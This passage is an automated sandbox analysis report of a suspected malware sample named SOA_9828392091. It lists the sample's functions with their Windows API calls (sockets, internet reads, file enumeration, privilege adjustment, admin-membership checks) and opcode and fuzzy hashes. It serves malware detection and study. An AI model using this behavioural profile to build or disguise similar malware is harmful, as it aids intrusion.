                                      • Instruction Fuzzy Hash: 2621A472904218ABDB10EBA4CD88FEEB7BCAB49310F5044E5F909E7141EB759F85DB60
                                      Function 00939B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$ZZQCWCVCM
                                      • API String ID: 0-1888135884
                                      • Opcode ID: cfcd1240021b735516ba8c4bab76907567f685bf7488782fee32865184a5c7dc
                                      • Instruction ID: a88e93455b397819ac4531da217868bf87299c9988827c24b2ae1b98e3e52514
                                      • Opcode Fuzzy Hash: cfcd1240021b735516ba8c4bab76907567f685bf7488782fee32865184a5c7dc
                                      • Instruction Fuzzy Hash: E992A0B1E0421ACBDF24CF58C9807FDB7B5BB54324F1485AAE856AB280D7B49D81CF91
                                      Function 0098923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0098A82C: inet_addr.WS2_32(00000000), ref: 0098A84E
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00989296
                                      • WSAGetLastError.WS2_32(00000000,00000000), ref: 009892B9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLastinet_addrsocket
                                      • String ID:
                                      • API String ID: 4170576061-0
                                      • Opcode ID: d131b8f284551c2ac7ee8538cf3e5085b87cfa268f900d2a648634cf4cba67ab
                                      • Instruction ID: 4a8690ae8dd477628bc42a5295578de4f1e28b925d991cd0d7b40e1e0a8afad5
                                      • Opcode Fuzzy Hash: d131b8f284551c2ac7ee8538cf3e5085b87cfa268f900d2a648634cf4cba67ab
                                      • Instruction Fuzzy Hash: 3841BF71600604AFDB14BF68C882F7E77EDEF84724F148548F956AB392DA749E018BA1
                                      Function 0097EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0097EB8A
                                      • _wcscmp.LIBCMT ref: 0097EBBA
                                      • _wcscmp.LIBCMT ref: 0097EBCF
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0097EBE0
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0097EC0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                      • String ID:
                                      • API String ID: 2387731787-0
                                      • Opcode ID: 1ffe726b1613f1230d11b5bc48042861f593f3facb72ef079ee2917758238332
                                      • Instruction ID: 6c5db2f52be87bf785004d2ba0bfdc749a0d0898e05fbed1d044c000c61cbfa9
                                      • Opcode Fuzzy Hash: 1ffe726b1613f1230d11b5bc48042861f593f3facb72ef079ee2917758238332
                                      • Instruction Fuzzy Hash: 1D41B0756047029FC708DF28C491E99B7E8FF89324F14859DF95A8B3A1DB31A944CB91
                                      Function 00998111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: dfddc379ecae9a330224c1d4401d6a04ab9f717a9fd9e674a944d97b1ae2b3ae
                                      • Instruction ID: caac45d32423c0e33fa362caa9b18f65d0ada78a15191a4e79eb570dca2fa0d4
                                      • Opcode Fuzzy Hash: dfddc379ecae9a330224c1d4401d6a04ab9f717a9fd9e674a944d97b1ae2b3ae
                                      • Instruction Fuzzy Hash: E911B2317091156FEB311F2ADC44F6FB79DEF85761B04042DF849D7281DF34A90286A4
                                      Function 0099F1D7 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • GetCursorPos.USER32(?), ref: 0099F211
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009AE4C0,?,?,?,?,?), ref: 0099F226
                                      • GetCursorPos.USER32(?), ref: 0099F270
                                      • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,009AE4C0,?,?,?), ref: 0099F2A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                      • String ID:
                                      • API String ID: 1423138444-0
                                      • Opcode ID: f095342275bfab2876025e6706e447e004abe645081d50941bae0ba84e62666b
                                      • Instruction ID: 8c254188a30e0a7d59baec0982fb253298553a75bf1e47865bd032b2e096da2f
                                      • Opcode Fuzzy Hash: f095342275bfab2876025e6706e447e004abe645081d50941bae0ba84e62666b
                                      • Instruction Fuzzy Hash: F421B439501018EFDF298F58C968EFEBBB9EF49321F044065F915871A1D3309D90EB90
                                      Function 0094B55D Relevance: 6.1, APIs: 4, Instructions: 56nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 0094B5A5
                                      • GetClientRect.USER32(?,?), ref: 009AE69A
                                      • GetCursorPos.USER32(?), ref: 009AE6A4
                                      • ScreenToClient.USER32(?,?), ref: 009AE6AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                      • String ID:
                                      • API String ID: 1010295502-0
                                      • Opcode ID: 331f162db6b226d871f7b2c3acfdbbb63bc6c62ca3e6379712e34747893938d0
                                      • Instruction ID: b23031488ab4169102ab3bf61786fb9fdca5cc39a6a1fc64d55b9a2a50e448ad
                                      • Opcode Fuzzy Hash: 331f162db6b226d871f7b2c3acfdbbb63bc6c62ca3e6379712e34747893938d0
                                      • Instruction Fuzzy Hash: 2811363190102AFFCB10EF98CD85EAEB7B8EB49314F000851F901E7140E334EA91DBA1
                                      Function 009713CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009713DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($|
                                      • API String ID: 1659193697-1631851259
                                      • Opcode ID: 73da8198924ee6abcd144b11fc25ecb34998a7e52dc0f8af1474a4955f0d3596
                                      • Instruction ID: ea1278a19521bf7a731ed1cc0ca5e3e1e7c9e356b8dbefb3e08aee45fa1ce4ec
                                      • Opcode Fuzzy Hash: 73da8198924ee6abcd144b11fc25ecb34998a7e52dc0f8af1474a4955f0d3596
                                      • Instruction Fuzzy Hash: 8B321475A007059FC728CF69C481AAAB7F4FF48320B15C56EE59ADB3A1E770E941CB44
                                      Function 0094B11F Relevance: 4.9, APIs: 3, Instructions: 377nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0094B22F
                                        • Part of subcall function 0094B55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 0094B5A5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_$LongWindow
                                      • String ID:
                                      • API String ID: 1155049231-0
                                      • Opcode ID: cfbba513c5b0dedc37d53896fb24010cbdc9a6049330b639281628841f8f887f
                                      • Instruction ID: dea60bd5c38aafd112063c4e312c6ab3502c777c07ae3307677cde6343528874
                                      • Opcode Fuzzy Hash: cfbba513c5b0dedc37d53896fb24010cbdc9a6049330b639281628841f8f887f
                                      • Instruction Fuzzy Hash: BBA18770118105BADF38AF2E5C98FBF399CEBAB354B144919F412D21A5DB69DC00E3B2
                                      Function 00984EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009843BF,00000000), ref: 00984FA6
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00984FD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 728b9662f743d8102c0c430e0184d41ee79c3ae769562cf44892f2dcf57f7bff
                                      • Instruction ID: a19694b3bc963b04a175054517a3ce83fe92c9118d4d318cba7f855fb2375079
                                      • Opcode Fuzzy Hash: 728b9662f743d8102c0c430e0184d41ee79c3ae769562cf44892f2dcf57f7bff
                                      • Instruction Fuzzy Hash: 8841E47150420ABFEB21EE80CC85FBF77ACEF80364F10406EF605A6281EA759E45D7A0
                                      Function 0097E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0097E20D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0097E267
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0097E2B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 4999fb99675d559aeadf14d0366d393ec125a785de753ca9153f16c92f93c56d
                                      • Instruction ID: cf62f138e05b1425528c29d0017595280cc02c701ce2b28b3aaed78d627d6e70
                                      • Opcode Fuzzy Hash: 4999fb99675d559aeadf14d0366d393ec125a785de753ca9153f16c92f93c56d
                                      • Instruction Fuzzy Hash: AE216D75A10218EFCB04EFA5D885EADFBB8FF88310F0484A9E945AB251DB319905CB50
                                      Function 0096B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094F4EA: std::exception::exception.LIBCMT ref: 0094F51E
                                        • Part of subcall function 0094F4EA: __CxxThrowException@8.LIBCMT ref: 0094F533
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096B180
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096B1AD
                                      • GetLastError.KERNEL32 ref: 0096B1BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                      • String ID:
                                      • API String ID: 1922334811-0
                                      • Opcode ID: 388f6e9e7d6a2f86c014b3fa22ceb09493d8287c7d45e7929fdc447fd7881387
                                      • Instruction ID: 02116bdc0036712459970ea4a1d7bd7b5987cf04538bc4123c07ae4a9c11d34b
                                      • Opcode Fuzzy Hash: 388f6e9e7d6a2f86c014b3fa22ceb09493d8287c7d45e7929fdc447fd7881387
                                      • Instruction Fuzzy Hash: 9011BCB2518205BFE718AF64DC96E2BB7BCEB44320B21852EE05693250EB70FC418A60
                                      Function 00976685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009766AF
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009766EC
                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009766F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: ebbd1e379d173a0970e229df303b7e877fef47e4857411efd528c7394cef25de
                                      • Instruction ID: 07a18689b03063e6aebde8dc258ff569d51d049f1dbed17ba1115ad9d6ebb065
                                      • Opcode Fuzzy Hash: ebbd1e379d173a0970e229df303b7e877fef47e4857411efd528c7394cef25de
                                      • Instruction Fuzzy Hash: 7211A5B2915228BEE7108BA8DC45FAF77BCEB04764F004656F905E7191D2749E0487A5
                                      Function 009771FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00977223
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0097723A
                                      • FreeSid.ADVAPI32(?), ref: 0097724A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: c388ee02337fe7953939a1cc04db11ceccd53448e6194226e668c919c5e2dede
                                      • Instruction ID: 6a0eef3b0b30bebfa8506a06c961d97a46737f3e0ad26b564444792a63242b00
                                      • Opcode Fuzzy Hash: c388ee02337fe7953939a1cc04db11ceccd53448e6194226e668c919c5e2dede
                                      • Instruction Fuzzy Hash: 46F01D76A19209BFDF04DFE4DD89AEEBBBCEF08211F104569A602E2191E2709A449B10
                                      Function 0094B385 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • GetParent.USER32(?), ref: 009AE5B2
                                      • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0094B1E8,?,?,?,00000006,?), ref: 009AE62C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LongWindow$DialogNtdllParentProc_
                                      • String ID:
                                      • API String ID: 314495775-0
                                      • Opcode ID: b6bc740ecd4d2dedcbec5fbd86f996a02a6298bfd71230568660b85df159025c
                                      • Instruction ID: b5bc31ded5ebbdbd5bd9bbc0254dc08b57afa2d28a3735fb96df1a2671437ccc
                                      • Opcode Fuzzy Hash: b6bc740ecd4d2dedcbec5fbd86f996a02a6298bfd71230568660b85df159025c
                                      • Instruction Fuzzy Hash: 4B218234606104AFCF248F2DDC85DB93BAAAB4A328F184252F6154B2E2D730DD11DB90
                                      Function 0097F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0097F599
                                      • FindClose.KERNEL32(00000000), ref: 0097F5C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 3bdfc01bba7ea7104a65f82799005b5eb19555c7f2e16f9b61f2af685231a69d
